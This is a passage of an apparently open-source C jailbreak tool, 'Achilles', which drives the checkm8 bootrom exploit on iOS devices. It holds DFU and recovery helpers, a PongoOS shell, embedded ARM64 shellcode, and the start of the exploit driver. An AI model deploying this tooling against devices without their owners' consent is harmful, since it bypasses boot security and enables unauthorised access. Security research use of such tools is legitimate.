| { 28 | LOG(LOG_ERROR, "More than one device found, please use the -u argument to specify a UDID."); 29 | return false; 30 | } 31 | 32 | udid = deviceIDs[0]; 33 | } 34 | 35 | if (idevice_new(&newDevice, udid) != IDEVICE_E_SUCCESS) { 36 | return false; 37 | } 38 | 39 | if (newDevice) { 40 | break; 41 | } 42 | no_devices: 43 | sleep_ms(100); 44 | } 45 | 46 | *device = newDevice; 47 | return true; 48 | } 49 | 50 | bool place_device_into_recovery_mode(idevice_t device) { 51 | 52 | lockdownd_client_t lockdown_client = NULL; 53 | lockdownd_error_t ret = lockdownd_client_new(device, &lockdown_client, "AchillesRecoveryHelper"); 54 | 55 | if (ret != LOCKDOWN_E_SUCCESS) { 56 | LOG(LOG_ERROR, "Failed to connect to lockdown service."); 57 | idevice_free(device); 58 | return false; 59 | } 60 | 61 | ret = lockdownd_enter_recovery(lockdown_client); 62 | if (ret == LOCKDOWN_E_SESSION_INACTIVE) { 63 | lockdownd_client_free(lockdown_client); 64 | lockdown_client = NULL; 65 | ret = lockdownd_client_new_with_handshake(device, &lockdown_client, "AchillesRecoveryHelper"); 66 | if (ret != LOCKDOWN_E_SUCCESS) { 67 | LOG(LOG_ERROR, "Could not connect to lockdownd: %s", lockdownd_strerror(ret)); 68 | return false; 69 | } 70 | ret = lockdownd_enter_recovery(lockdown_client); 71 | } 72 | 73 | if (ret != LOCKDOWN_E_SUCCESS) { 74 | LOG(LOG_ERROR, "Could not enter recovery mode: %s", lockdownd_strerror(ret)); 75 | return false; 76 | } 77 | 78 | lockdownd_client_free(lockdown_client); 79 | idevice_free(device); 80 | 81 | LOG(LOG_SUCCESS, "Device should be entering recovery mode now."); 82 | return true; 83 | } -------------------------------------------------------------------------------- /src/utils/log.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | extern bool dfu_device_found; 4 | extern struct AchillesArgs args; 5 | 6 | void step(int time, int time2, char *text) { 7 | // TODO: make this use LOG 8 | for (int i = time2; i < time; i++) { 9 | if (dfu_device_found) { return; } 10 | printf(BCYN "\r\033[K%s (%d)" CRESET, text, time - i + time2); 11 | fflush(stdout); 12 | sleep(1); 13 | } 14 | printf(CYN "\r%s (%d)" CRESET, text, time2); 15 | if (time2 == 0) puts(""); 16 | } 17 | 18 | int AchillesLog(log_level_t loglevel, bool newline, const char *fname, int lineno, const char *fxname, const char *__restrict format, ...) 19 | { 20 | int ret = 0; 21 | pthread_mutex_t log_mutex; 22 | pthread_mutex_init(&log_mutex, NULL); 23 | char type[0x10]; 24 | char colour[0x10]; 25 | char colour_bold[0x10]; 26 | va_list logArgs; 27 | va_start(logArgs, format); 28 | switch (loglevel) { 29 | case LOG_ERROR: 30 | snprintf(type, 0x10, "%s", "Error"); 31 | snprintf(colour, 0x10, "%s", RED); 32 | snprintf(colour_bold, 0x10, "%s", BRED); 33 | break; 34 | case LOG_INFO: 35 | snprintf(type, 0x10, "%s", "Info"); 36 | snprintf(colour, 0x10, "%s", CYN); 37 | snprintf(colour_bold, 0x10, "%s", BCYN); 38 | if (args.quiet) { goto out; } 39 | break; 40 | case LOG_SUCCESS: 41 | snprintf(type, 0x10, "%s", "Success"); 42 | snprintf(colour, 0x10, "%s", GRN); 43 | snprintf(colour_bold, 0x10, "%s", BGRN); 44 | if (args.quiet) { goto out; } 45 | break; 46 | default: // LOG_VERBOSE 47 | if (!args.verbose) { 48 | return 0; 49 | } 50 | assert(loglevel >= 0); 51 | snprintf(type, 0x10, "%s", "Verbose"); 52 | snprintf(colour, 0x10, "%s", WHT); 53 | snprintf(colour_bold, 0x10, "%s", BWHT); 54 | break; 55 | } 56 | { 57 | pthread_mutex_lock(&log_mutex); 58 | char timestring[0x80]; 59 | time_t curtime; 60 | time(&curtime); 61 | struct tm *timeinfo = localtime(&curtime); 62 | snprintf(timestring, 0x80, "%s[%s%02d/%02d/%d %02d:%02d:%02d%s]", CRESET, HBLK, timeinfo->tm_mon + 1, timeinfo->tm_mday, timeinfo->tm_year - 100, timeinfo->tm_hour, timeinfo->tm_min, timeinfo->tm_sec, CRESET); 63 | if (args.verbose && args.debug) { 64 | printf("%s%s%s <%s> " CRESET "%s" HBLU "%s" CRESET ":" RED "%d" CRESET ":" BGRN "%s()" CRESET ":%s ", colour_bold, timestring, colour_bold, type, WHT, fname, lineno, fxname, colour_bold); 65 | } 66 | else if (args.verbose) { 67 | printf("%s%s%s <%s>" CRESET ":%s ", colour_bold, timestring, colour_bold, type, colour_bold); 68 | } 69 | else { 70 | printf("%s<%s>%s: ", colour_bold, type, CRESET); 71 | } 72 | printf("%s", colour); 73 | ret = vprintf(format, logArgs); 74 | va_end(logArgs); 75 | if (newline) { 76 | printf(CRESET "\n"); 77 | } else { 78 | printf(CRESET); 79 | } 80 | fflush(stdout); 81 | } 82 | out: 83 | pthread_mutex_unlock(&log_mutex); 84 | return ret; 85 | } 86 | -------------------------------------------------------------------------------- /src/pongo/boot.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | bool wait_for_device_to_enter_yolo_dfu(usb_handle_t *handle) { 5 | char *serialNumber = NULL; 6 | wait_usb_handle(handle); 7 | serialNumber = get_usb_device_serial_number(handle); 8 | if (serialNumber == NULL) { 9 | LOG(LOG_ERROR, "Failed to get device serial number."); 10 | close_usb_handle(handle); 11 | return false; 12 | } 13 | unsigned totalTime = 0; 14 | while (!dfu_serial_number_is_in_yolo_dfu(serialNumber)) { 15 | wait_usb_handle(handle); 16 | free(serialNumber); 17 | serialNumber = get_usb_device_serial_number(handle); 18 | close_usb_handle(handle); 19 | if (serialNumber == NULL) { 20 | LOG(LOG_ERROR, "Failed to get device serial number."); 21 | return false; 22 | } 23 | sleep_ms(100); 24 | totalTime += 100; 25 | if (totalTime >= 15000) { 26 | LOG(LOG_ERROR, "Device failed to enter Yolo DFU mode."); 27 | return false; 28 | } 29 | } 30 | close_usb_handle(handle); 31 | return true; 32 | } 33 | 34 | bool send_pongo_to_yolo_dfu(usb_handle_t *handle) { 35 | unsigned char *pongoData = NULL; 36 | size_t pongoSize = 0; 37 | if (!prepare_pongo(&pongoData, &pongoSize) || pongoData == NULL || pongoSize == 0) { 38 | LOG(LOG_ERROR, "Failed to prepare PongoOS."); 39 | return false; 40 | } 41 | bool ret = false; 42 | if (wait_usb_handle(handle)) { 43 | if (dfu_serial_number_is_in_yolo_dfu(get_usb_device_serial_number(handle))) { 44 | size_t lengthSent = 0, size; 45 | transfer_ret_t transferRet; 46 | while (lengthSent < pongoSize) { 47 | retry: 48 | size = ((pongoSize - lengthSent) > 0x800) ? 0x800 : (pongoSize - lengthSent); 49 | send_usb_control_request(handle, 0x21, DFU_DNLOAD, 0, 0, pongoData + lengthSent, size, &transferRet); 50 | if (transferRet.sz != size || transferRet.ret != USB_TRANSFER_OK) { 51 | LOG(LOG_VERBOSE, "Retrying at size 0x%lx...", size); 52 | sleep_ms(100); 53 | goto retry; 54 | } 55 | lengthSent += size; 56 | } 57 | send_usb_control_request_no_data(handle, 0x21, DFU_CLRSTATUS, 0, 0, 0, NULL); 58 | close_usb_handle(handle); 59 | sleep_ms(100); 60 | init_usb_handle(handle, 0x5AC, 0x4141); 61 | wait_usb_handle(handle); 62 | free(pongoData); 63 | LOG(LOG_SUCCESS, "Device is now in PongoOS!"); 64 | ret = true; 65 | } 66 | else { 67 | free(pongoData); 68 | LOG(LOG_ERROR, "Device is not in Yolo DFU mode!"); 69 | } 70 | } 71 | return ret; 72 | } -------------------------------------------------------------------------------- /include/pongo/shellcode.h: -------------------------------------------------------------------------------- 1 | unsigned char decompressor_shellcode[] = { 2 | 0xf2, 0x03, 0x1e, 0xaa, 0xf1, 0x03, 0x00, 0xaa, 0xe1, 0x07, 0x61, 0xb2, 3 | 0xe3, 0x27, 0x17, 0x32, 0x25, 0x00, 0x03, 0x8b, 0x42, 0x0f, 0x00, 0x18, 4 | 0x02, 0x00, 0x00, 0x34, 0xa0, 0x00, 0x02, 0xcb, 0x00, 0xec, 0x7c, 0x92, 5 | 0xe4, 0x0e, 0x00, 0x10, 0x66, 0x01, 0x00, 0x10, 0x07, 0x34, 0x80, 0xd2, 6 | 0xc8, 0x44, 0x40, 0xb8, 0xa8, 0x44, 0x00, 0xb8, 0xe7, 0x10, 0x00, 0x51, 7 | 0xa7, 0xff, 0xff, 0x35, 0x25, 0x00, 0x03, 0x8b, 0xa6, 0x80, 0x06, 0x91, 8 | 0x22, 0x00, 0x00, 0x94, 0x25, 0x00, 0x03, 0x8b, 0xa0, 0x00, 0x1f, 0xd6, 9 | 0x1f, 0x00, 0x04, 0xeb, 0xe0, 0x01, 0x00, 0x54, 0xe8, 0x00, 0x00, 0x54, 10 | 0xe6, 0x03, 0x00, 0xaa, 0x87, 0x20, 0xc1, 0xa8, 0xc7, 0x20, 0x81, 0xa8, 11 | 0xdf, 0x00, 0x05, 0xeb, 0xa3, 0xff, 0xff, 0x54, 0x08, 0x00, 0x00, 0x14, 12 | 0x84, 0x00, 0x02, 0x8b, 0x84, 0x3c, 0x00, 0x91, 0x84, 0xec, 0x7c, 0x92, 13 | 0x87, 0x20, 0xff, 0xa9, 0xa7, 0x20, 0xbf, 0xa9, 0xbf, 0x00, 0x00, 0xeb, 14 | 0xa8, 0xff, 0xff, 0x54, 0x19, 0x00, 0x00, 0x94, 0x00, 0x00, 0x00, 0xb4, 15 | 0xe5, 0x07, 0x61, 0xb2, 0xa6, 0x00, 0x00, 0x8b, 0x0b, 0x00, 0x00, 0x94, 16 | 0x48, 0x42, 0x38, 0xd5, 0x1f, 0x31, 0x00, 0xf1, 0x41, 0x00, 0x00, 0x54, 17 | 0x1f, 0x10, 0x1e, 0xd5, 0x1f, 0x10, 0x18, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 18 | 0xe0, 0x03, 0x11, 0xaa, 0xfe, 0x03, 0x12, 0xaa, 0xf2, 0x07, 0x61, 0xb2, 19 | 0x40, 0x02, 0x1f, 0xd6, 0x9f, 0x3f, 0x03, 0xd5, 0x25, 0x7e, 0x0b, 0xd5, 20 | 0xa5, 0x00, 0x01, 0x91, 0xbf, 0x00, 0x06, 0xeb, 0xa3, 0xff, 0xff, 0x54, 21 | 0x9f, 0x3f, 0x03, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 0x1f, 0x75, 0x08, 0xd5, 22 | 0xdf, 0x3f, 0x03, 0xd5, 0xc0, 0x03, 0x5f, 0xd6, 0xef, 0x03, 0x1e, 0xaa, 23 | 0xee, 0x03, 0x01, 0xaa, 0x02, 0x00, 0x02, 0xab, 0x22, 0x07, 0x00, 0x54, 24 | 0x23, 0x00, 0x03, 0xab, 0xe2, 0x06, 0x00, 0x54, 0x1f, 0x00, 0x02, 0xeb, 25 | 0xa2, 0x06, 0x00, 0x54, 0x04, 0x14, 0x40, 0x38, 0x85, 0x0c, 0x00, 0x12, 26 | 0x84, 0x1c, 0x04, 0x53, 0xe4, 0x01, 0x00, 0x34, 0x26, 0x00, 0x00, 0x94, 27 | 0x3f, 0x00, 0x00, 0xeb, 0x22, 0x20, 0x42, 0xfa, 0x02, 0x20, 0x42, 0xfa, 28 | 0x22, 0x30, 0x43, 0xfa, 0x46, 0x00, 0x00, 0xcb, 0x82, 0x30, 0x46, 0xfa, 29 | 0x66, 0x00, 0x01, 0xcb, 0x82, 0x90, 0x46, 0xfa, 0xe8, 0x04, 0x00, 0x54, 30 | 0x06, 0x14, 0x40, 0x38, 0x26, 0x14, 0x00, 0x38, 0x84, 0x04, 0x00, 0xd1, 31 | 0xa4, 0xff, 0xff, 0xb5, 0xbf, 0x00, 0x00, 0x71, 0x00, 0x00, 0x42, 0xfa, 32 | 0x22, 0x04, 0x00, 0x54, 0xe4, 0x03, 0x05, 0x2a, 0x46, 0x00, 0x00, 0xcb, 33 | 0xdf, 0x08, 0x00, 0xf1, 0x83, 0x03, 0x00, 0x54, 0x05, 0x14, 0x40, 0x38, 34 | 0x06, 0x14, 0x40, 0x38, 0xc5, 0x1c, 0x18, 0x33, 0x05, 0x03, 0x00, 0x34, 35 | 0x0d, 0x00, 0x00, 0x94, 0x84, 0x10, 0x00, 0xb1, 0xa2, 0x02, 0x00, 0x54, 36 | 0x25, 0x00, 0x05, 0xeb, 0xa0, 0x20, 0x4e, 0xfa, 0x66, 0x00, 0x01, 0xcb, 37 | 0xc0, 0x20, 0x44, 0xfa, 0x03, 0x02, 0x00, 0x54, 0xa6, 0x14, 0x40, 0x38, 38 | 0x26, 0x14, 0x00, 0x38, 0x84, 0x04, 0x00, 0xd1, 0xa4, 0xff, 0xff, 0xb5, 39 | 0xd5, 0xff, 0xff, 0x17, 0x9f, 0x3c, 0x00, 0x71, 0x01, 0x01, 0x00, 0x54, 40 | 0x1f, 0x00, 0x02, 0xeb, 0xe2, 0x00, 0x00, 0x54, 0x06, 0x14, 0x40, 0x38, 41 | 0x84, 0x00, 0x06, 0xab, 0x82, 0x00, 0x00, 0x54, 0xdf, 0xfc, 0x03, 0x71, 42 | 0x40, 0xff, 0xff, 0x54, 0xc0, 0x03, 0x5f, 0xd6, 0xe1, 0x03, 0x0e, 0xaa, 43 | 0x20, 0x00, 0x0e, 0xcb, 0xe0, 0x01, 0x5f, 0xd6, 0x00, 0x00, 0x00, 0x00, 44 | 0x00, 0x00, 0x00, 0x00, 0x1b, 0x42, 0x02, 0x00 45 | }; 46 | unsigned int decompressor_shellcode_len = 512; 47 | -------------------------------------------------------------------------------- /src/pongo/pongoterm.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | size_t pongo_fetch_output(usb_handle_t *handle, char *buffer) { 5 | uint32_t outPosition = 0; 6 | uint32_t outLength = 0; 7 | uint8_t inProgress = 1; 8 | while (inProgress) { 9 | transfer_ret_t transferRet; 10 | int ret = send_usb_control_request(handle, 0xA1, 2, 0, 0, &inProgress, (uint32_t)sizeof(inProgress), NULL); 11 | if (ret) { 12 | ret = send_usb_control_request(handle, 0xA1, 1, 0, 0, buffer + outPosition, 0x1000, &transferRet); 13 | outLength = transferRet.sz; 14 | if (transferRet.ret == USB_TRANSFER_OK) { 15 | outPosition += outLength; 16 | if (outPosition > 0x1000) { 17 | memmove(buffer, buffer + outPosition - 0x1000, 0x1000); 18 | outPosition = 0x1000; 19 | } 20 | } 21 | } 22 | if (transferRet.ret != USB_TRANSFER_OK) { 23 | return 0; 24 | } 25 | } 26 | return outPosition; 27 | } 28 | 29 | void write_to_stdout(char *buffer, size_t length) { 30 | for (size_t i = 0; i < length; i++) { 31 | putchar(buffer[i]); 32 | } 33 | } 34 | 35 | char *get_file_name_from_command(char *str) { 36 | str += 6; 37 | 38 | // If dragged from a terminal, it will be enclosed in quotes 39 | if (str[0] == '"' || str[0] == '\'') { 40 | str++; 41 | str[strlen(str) - 1] = 0; 42 | } 43 | return str; 44 | } 45 | 46 | void pongoterm(void) { 47 | transfer_ret_t transferRet; 48 | usb_handle_t *handle = malloc(sizeof(usb_handle_t)); 49 | init_usb_handle(handle, 0x5AC, 0x4141); 50 | wait_usb_handle(handle); 51 | 52 | while (1) { 53 | 54 | // Fetch existing output 55 | char buffer[0x2000]; 56 | size_t outPosition = pongo_fetch_output(handle, buffer); 57 | write_to_stdout(buffer, outPosition); 58 | memset(buffer, 0, 0x2000); 59 | 60 | send_usb_control_request_no_data(handle, 0x21, 4, 0xffff, 0, 0, &transferRet); 61 | if (transferRet.ret != USB_TRANSFER_OK) { 62 | printf("Failed to clear buffer.\n"); 63 | } 64 | 65 | // Get the next command 66 | char *command = malloc(0x200); 67 | fgets(command, 0x200, stdin); 68 | 69 | // Check if it's sending a file 70 | if (strncmp(command, "/send", 5) == 0) { 71 | // NULL the last character (newline) 72 | command[strlen(command) - 1] = 0; 73 | if (strlen(command) < 7) { 74 | printf("Usage: /send FILE\n"); 75 | continue; 76 | } 77 | char *path = get_file_name_from_command(command); 78 | struct stat st; 79 | if (stat(path, &st) != 0) { 80 | printf("Failed to stat %s.\n", path); 81 | continue; 82 | } 83 | if (upload_file_to_pongo(handle, path)) { 84 | printf("%sUploaded 0x%llx bytes to PongoOS.\n", BCYN, st.st_size); 85 | } else { 86 | printf("%sFailed to upload file.\n", BRED); 87 | } 88 | printf(CRESET); 89 | printf("pongoOS> "); 90 | } 91 | 92 | // Check if it's a command to boot (we shouldn't fetch output after this) 93 | else if (strncmp(command, "boot", 4) == 0) { 94 | issue_pongo_command(handle, command, buffer); 95 | return; 96 | } 97 | 98 | else if (strncmp(command, "exit", 4) == 0) { 99 | return; 100 | } 101 | 102 | // Just a regular command 103 | else { 104 | issue_pongo_command(handle, command, buffer); 105 | write_to_stdout(buffer, strlen(buffer)); 106 | } 107 | } 108 | } -------------------------------------------------------------------------------- /src/exploit/dfu.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | bool dfu_check_status(const usb_handle_t *handle, uint8_t status, uint8_t state) { 4 | struct { 5 | uint8_t status, poll_timeout[3], state, str_idx; 6 | } dfu_status; 7 | transfer_ret_t transfer_ret; 8 | 9 | return send_usb_control_request(handle, 0xA1, DFU_GETSTATUS, 0, 0, &dfu_status, sizeof(dfu_status), &transfer_ret) 10 | && transfer_ret.ret == USB_TRANSFER_OK && transfer_ret.sz == sizeof(dfu_status) 11 | && dfu_status.status == status && dfu_status.state == state; 12 | } 13 | 14 | bool dfu_device_set_await_reset(const usb_handle_t *handle) { 15 | transfer_ret_t transfer_ret; 16 | 17 | return send_usb_control_request_no_data(handle, 0x21, DFU_DNLOAD, 0, 0, 0, &transfer_ret) 18 | && transfer_ret.ret == USB_TRANSFER_OK && transfer_ret.sz == 0 19 | && dfu_check_status(handle, DFU_STATUS_OK, DFU_STATE_MANIFEST_SYNC) 20 | && dfu_check_status(handle, DFU_STATUS_OK, DFU_STATE_MANIFEST) 21 | && dfu_check_status(handle, DFU_STATUS_OK, DFU_STATE_MANIFEST_WAIT_RESET); 22 | } 23 | 24 | int dfu_serial_number_get_cpid(char *serial) { 25 | char *cpid = strstr(serial, "CPID:"); 26 | if (cpid == NULL) { return -1; } 27 | return strtol(cpid + 5, NULL, 16); 28 | } 29 | 30 | int dfu_serial_number_get_bdid(char *serial) { 31 | char *bdid = strstr(serial, "BDID:"); 32 | if (bdid == NULL) { return -1; } 33 | return strtol(bdid + 5, NULL, 16); 34 | } 35 | 36 | bool dfu_serial_number_is_in_dfu_mode(char *serial) { 37 | char *DFU = strstr(serial, "SRTG"); 38 | return DFU != NULL; 39 | } 40 | 41 | bool dfu_serial_number_is_pwned(char *serial) { 42 | char *pwnd = strstr(serial, "PWND:"); 43 | return pwnd != NULL; 44 | } 45 | 46 | bool dfu_serial_number_is_in_yolo_dfu(char *serial) { 47 | char *yolo = strstr(serial, "YOLO"); 48 | return yolo != NULL; 49 | } 50 | 51 | bool device_serial_number_is_in_pongo_os(char *serial) { 52 | char *pongo = strstr(serial, "SRTG:[PongoOS"); 53 | return pongo != NULL; 54 | } 55 | 56 | // palera1n-based DFU helper 57 | 58 | bool dfu_device_found = false; 59 | 60 | #define NOHOME (cpid == 0x8015 || (cpid == 0x8010 && (bdid == 0x08 || bdid == 0x0a || bdid == 0x0c || bdid == 0x0e))) 61 | void dfu_helper(usb_handle_t *handle) { 62 | char *serialNumber = get_usb_device_serial_number(handle); 63 | if (serialNumber == NULL) { 64 | LOG(LOG_ERROR, "Failed to get device serial number."); 65 | close_usb_handle(handle); 66 | return; 67 | } 68 | 69 | int cpid = dfu_serial_number_get_cpid(serialNumber); 70 | if (cpid < 0) { 71 | LOG(LOG_ERROR, "Failed to get device CPID."); 72 | free(serialNumber); 73 | close_usb_handle(handle); 74 | return; 75 | } 76 | 77 | int bdid = dfu_serial_number_get_bdid(serialNumber); 78 | if (bdid < 0) { 79 | LOG(LOG_ERROR, "Failed to get device BDID."); 80 | free(serialNumber); 81 | return; 82 | } 83 | 84 | if (handle->pid != 0x1281) { 85 | LOG(LOG_ERROR, "Device is not in recovery mode."); 86 | free(serialNumber); 87 | return; 88 | } 89 | 90 | LOG_NO_NEWLINE(LOG_INFO, "Press enter when ready to put device into DFU mode"); 91 | getchar(); 92 | 93 | step(3, 0, "Get ready..."); 94 | 95 | if (NOHOME) { 96 | step(4, 2, "Hold volume down + side button"); 97 | } else { 98 | step(4, 2, "Hold home + power button"); 99 | } 100 | 101 | send_command_to_recovery_mode(handle, "setenv auto-boot true"); 102 | sleep_ms(100); 103 | send_command_to_recovery_mode(handle, "saveenv"); 104 | sleep_ms(100); 105 | send_command_to_recovery_mode(handle, "reboot"); 106 | 107 | if (NOHOME) { 108 | step(2, 0, "Hold volume down + side button"); 109 | step(10, 0, "Hold volume down button"); 110 | if (dfu_device_found) { return; } 111 | } else { 112 | step(2, 0, "Hold home + power button"); 113 | step(10, 0, "Hold home button"); 114 | if (dfu_device_found) { return; } 115 | } 116 | 117 | } 118 | 119 | extern bool stopThreads; 120 | 121 | bool get_device_into_dfu_mode(usb_handle_t *handle) { 122 | pthread_t dfu_thread; 123 | usb_handle_t dfu_handle; 124 | init_usb_handle(&dfu_handle, 0x5AC, 0x1227); 125 | if (pthread_create(&dfu_thread, NULL, (void *)wait_usb_handle, &dfu_handle)) { 126 | LOG(LOG_ERROR, "Failed to create DFU thread!"); 127 | return false; 128 | } 129 | 130 | pthread_t dfu_helper_thread; 131 | if (pthread_create(&dfu_helper_thread, NULL, (void *)dfu_helper, handle)) { 132 | LOG(LOG_ERROR, "Failed to create DFU helper thread!"); 133 | return false; 134 | } 135 | 136 | pthread_detach(dfu_thread); 137 | pthread_detach(dfu_helper_thread); 138 | 139 | unsigned totalTime = 0; 140 | while (true) { 141 | sleep_ms(200); 142 | totalTime += 200; 143 | if (dfu_handle.device) { 144 | handle = &dfu_handle; 145 | puts(""); 146 | dfu_device_found = true; 147 | stopThreads = true; 148 | break; 149 | } 150 | if (totalTime >= 22500) { 151 | puts(""); 152 | LOG(LOG_ERROR, "Device failed to enter DFU mode."); 153 | stopThreads = true; 154 | return false; 155 | } 156 | } 157 | sleep_ms(200); 158 | stopThreads = false; 159 | return true; 160 | } -------------------------------------------------------------------------------- /src/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | char *get_argument_value(int argc, char *argv[], const char *flag) 6 | { 7 | for (int i = 0; i < argc; i++) { 8 | if (!strcmp(argv[i], flag)) { 9 | if (i+1 < argc) { 10 | return argv[i+1]; 11 | } 12 | } 13 | } 14 | return NULL; 15 | } 16 | 17 | bool argument_exists(int argc, char *argv[], const char *flag) 18 | { 19 | for (int i = 0; i < argc; i++) { 20 | if (!strcmp(argv[i], flag)) { 21 | if (!strcmp(flag, "-v") && (i - 1 > 0) && !strcmp(argv[i - 1], "-b")) { // -v is a valid boot argument 22 | return false; 23 | } 24 | return true; 25 | } 26 | } 27 | return false; 28 | } 29 | 30 | void print_usage(char *executablePath) { 31 | printf("Options:\n"); 32 | printf("\t-d - enable debug logging\n"); 33 | printf("\t-v - enable verbose logging\n"); 34 | printf("\t-q - enable quiet logging (removes all logging except for errors)\n"); 35 | printf("\t-s - remove signature checks\n"); 36 | printf("\t-p - boot to PongoOS and exit\n"); 37 | printf("\t-j - jailbreak the device (requires -K)\n"); 38 | printf("\t-V - enable verbose boot\n"); 39 | printf("\t-S - enable serial output\n"); 40 | printf("\t-T - start a PongoOS shell\n\n"); 41 | printf("\t-u - specify a device UDID\n"); 42 | printf("\t-b - additional boot arguments\n"); 43 | printf("\t-k - override PongoOS image\n"); 44 | printf("\t-K - override kernel patchfinder\n"); 45 | printf("\t-R - ramdisk to boot\n"); 46 | printf("\t-O - overlay to boot\n\n"); 47 | printf("\t-h - print this help message\n"); 48 | printf("Examples:\n"); 49 | printf("\t%s -p\n", executablePath); 50 | printf("\t%s -j -K kpf -R ramdisk.dmg -O overlay.dmg\n", executablePath); 51 | printf("\t%s -s\n", executablePath); 52 | exit(-1); 53 | } 54 | 55 | struct AchillesArgs args; 56 | 57 | bool check_for_argument_conflicts(struct AchillesArgs args, char *argv0) { 58 | if (args.jailbreak && !args.kpfPath) { 59 | LOG(LOG_ERROR, "-j requires -K."); 60 | print_usage(argv0); 61 | return false; 62 | } 63 | 64 | if (args.bootToPongo && args.jailbreak) { 65 | LOG(LOG_ERROR, "-p and -j are mutually exclusive."); 66 | print_usage(argv0); 67 | return false; 68 | } 69 | 70 | if (!args.disableSignatureChecks && !args.bootToPongo && !args.jailbreak && !args.pongoterm) { 71 | LOG(LOG_ERROR, "You must specify either -s, -p, or -j."); 72 | print_usage(argv0); 73 | return false; 74 | } 75 | 76 | if (args.disableSignatureChecks && (args.bootToPongo || args.jailbreak)) { 77 | LOG(LOG_ERROR, "-s is incompatible with -p and -j."); 78 | print_usage(argv0); 79 | return false; 80 | } 81 | return true; 82 | } 83 | 84 | struct AchillesArgs args; 85 | 86 | bool check_custom_paths(struct AchillesArgs args) { 87 | struct stat st; 88 | if (args.pongoPath) { 89 | if (stat(args.pongoPath, &st) != 0) { 90 | LOG(LOG_ERROR, "PongoOS image at %s does not exist.", args.pongoPath); 91 | return false; 92 | } 93 | } 94 | 95 | if (args.kpfPath) { 96 | if (stat(args.kpfPath, &st) != 0) { 97 | LOG(LOG_ERROR, "Kernel patchfinder at %s does not exist", args.kpfPath); 98 | return false; 99 | } 100 | } 101 | 102 | if (args.ramdiskPath) { 103 | if (stat(args.ramdiskPath, &st) != 0) { 104 | LOG(LOG_ERROR, "Ramdisk at %s does not exist.", args.ramdiskPath); 105 | return false; 106 | } 107 | } 108 | 109 | if (args.overlayPath) { 110 | if (stat(args.overlayPath, &st) != 0) { 111 | LOG(LOG_ERROR, "Overlay at %s does not exist.", args.overlayPath); 112 | return false; 113 | } 114 | } 115 | return true; 116 | } 117 | 118 | int main(int argc, char *argv[]) { 119 | 120 | if (argc < 2) { 121 | print_usage(argv[0]); 122 | } 123 | 124 | args.deviceUDID = get_argument_value(argc, argv, "-u"); 125 | 126 | args.debug = argument_exists(argc, argv, "-d"); 127 | args.verbose = argument_exists(argc, argv, "-v"); 128 | args.quiet = argument_exists(argc, argv, "-q"); 129 | args.disableSignatureChecks = argument_exists(argc, argv, "-s"); 130 | args.bootToPongo = argument_exists(argc, argv, "-p"); 131 | args.jailbreak = argument_exists(argc, argv, "-j"); 132 | args.verboseBoot = argument_exists(argc, argv, "-V"); 133 | args.serialOutput = argument_exists(argc, argv, "-S"); 134 | args.bootArgs = get_argument_value(argc, argv, "-b"); 135 | args.pongoterm = argument_exists(argc, argv, "-T"); 136 | 137 | args.pongoPath = get_argument_value(argc, argv, "-k"); 138 | args.kpfPath = get_argument_value(argc, argv, "-K"); 139 | args.ramdiskPath = get_argument_value(argc, argv, "-R"); 140 | args.overlayPath = get_argument_value(argc, argv, "-O"); 141 | 142 | if (argument_exists(argc, argv, "-h")) { 143 | print_usage(argv[0]); 144 | } 145 | 146 | if (!check_for_argument_conflicts(args, argv[0])) { 147 | return -1; 148 | } 149 | 150 | if (!check_custom_paths(args)) { 151 | return -1; 152 | } 153 | 154 | if (args.pongoterm) { 155 | pongoterm(); 156 | } else { 157 | checkm8((args.bootToPongo || args.jailbreak) ? MODE_PONGOOS : MODE_CHECKM8); 158 | } 159 | 160 | return 0; 161 | } -------------------------------------------------------------------------------- /src/exploit/exploit.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | bool stopThreads = false; 4 | extern struct AchillesArgs args; 5 | 6 | bool checkm8(enum ExploitMode mode) { 7 | usb_handle_t *handle = NULL; 8 | 9 | pthread_t normal_thread; 10 | idevice_t normal_device = NULL; 11 | 12 | pthread_t dfu_thread; 13 | usb_handle_t dfu_handle; 14 | init_usb_handle(&dfu_handle, 0x5AC, 0x1227); 15 | 16 | pthread_t recovery_thread; 17 | usb_handle_t recovery_handle; 18 | init_usb_handle(&recovery_handle, 0x5AC, 0x1281); 19 | 20 | pthread_t pongo_thread; 21 | usb_handle_t pongo_handle; 22 | init_usb_handle(&pongo_handle, 0x5AC, 0x4141); 23 | 24 | 25 | if (pthread_create(&normal_thread, NULL, (void *)find_device_in_normal_mode, &normal_device)) { 26 | LOG(LOG_ERROR, "Failed to create normal thread!"); 27 | return false; 28 | } 29 | if (pthread_create(&dfu_thread, NULL, (void *)wait_usb_handle, &dfu_handle)) { 30 | LOG(LOG_ERROR, "Failed to create DFU thread!"); 31 | return false; 32 | } 33 | if (pthread_create(&recovery_thread, NULL, (void *)wait_usb_handle, &recovery_handle)) { 34 | LOG(LOG_ERROR, "Failed to create recovery thread!"); 35 | return false; 36 | } 37 | if (pthread_create(&pongo_thread, NULL, (void *)wait_usb_handle, &pongo_handle)) { 38 | LOG(LOG_ERROR, "Failed to create PongoOS thread!"); 39 | return false; 40 | } 41 | 42 | pthread_detach(normal_thread); 43 | pthread_detach(dfu_thread); 44 | pthread_detach(recovery_thread); 45 | pthread_detach(pongo_thread); 46 | sleep_ms(200); 47 | 48 | if (normal_device) { 49 | LOG(LOG_INFO, "Found device in normal mode!"); 50 | // This will silently fail if the device is not in normal mode 51 | if (!place_device_into_recovery_mode(normal_device)) { 52 | LOG(LOG_ERROR, "Failed to place device into recovery mode!"); 53 | return false; 54 | } 55 | normal_device = NULL; 56 | goto wait_for_recovery; 57 | } else if (dfu_handle.device) { 58 | handle = &dfu_handle; 59 | LOG(LOG_INFO, "Found device in DFU mode!"); 60 | } else if (recovery_handle.device) { 61 | handle = &recovery_handle; 62 | LOG(LOG_INFO, "Found device in recovery mode!"); 63 | } else if (pongo_handle.device) { 64 | handle = &pongo_handle; 65 | } else { 66 | LOG(LOG_INFO, "Waiting for device..."); 67 | wait_for_recovery: 68 | while (true) { 69 | sleep_ms(200); 70 | if (normal_device) { 71 | LOG(LOG_INFO, "Found device in normal mode!"); 72 | // This will silently fail if the device is not in normal 